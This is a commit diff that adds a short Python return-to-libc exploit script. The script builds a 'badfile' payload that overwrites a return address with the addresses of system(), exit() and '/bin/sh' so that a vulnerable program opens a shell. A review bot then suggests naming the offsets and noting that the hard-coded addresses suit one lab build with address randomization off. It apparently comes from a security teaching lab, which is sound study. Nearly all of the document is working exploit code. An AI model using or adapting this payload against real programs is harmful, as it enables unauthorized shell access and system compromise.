1 parent 798a994 commit e9a4442Copy full SHA for e9a4442
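--- a/libc_exploit.py
+++ b/libc_exploit.py
@@ -0,0 +1,18 @@
+#!/usr/bin/python3
+import sys
+
+# Fill content with non-zero values
+content = bytearray(0xaa for i in range(300))
+
+sh_addr = 0xbffffdd8 # The address of "/bin/sh"
+content[120:124] = (sh_addr).to_bytes(4,byteorder='little')
+
+exit_addr = 0xb7e369d0 # The address of exit()
+content[116:120] = (exit_addr).to_bytes(4,byteorder='little')
+
+system_addr = 0xb7e42da0 # The address of system()
+content[112:116] = (system_addr).to_bytes(4,byteorder='little')
+
+# Save content to a file
+with open("badfile", "wb") as f:
+ f.write(content)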
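Review bot: The slice offsets 112, 116 and 120 and the three absolute addresses on new lines 7–14 are undocumented magic numbers, and the file has no header saying which target build and environment they belong to. The hard-coded libc and stack addresses presumably hold only for one lab image with address-space randomization turned off, so a header comment such as `# Lab artifact: offsets and addresses are specific to one build of the target and its libc with ASLR disabled; not portable.` would make that explicit. Naming the offsets (for example `SYSTEM_OFF = 112`, with the other two written as `SYSTEM_OFF + 4` and `SYSTEM_OFF + 8`) would show that the three 4-byte slots are adjacent instead of leaving the reader to check the arithmetic. `import sys` on line 2 is unused and can be dropped, and the fill on line 5 reads more simply as `content = bytearray(b'\xaa' * 300)`.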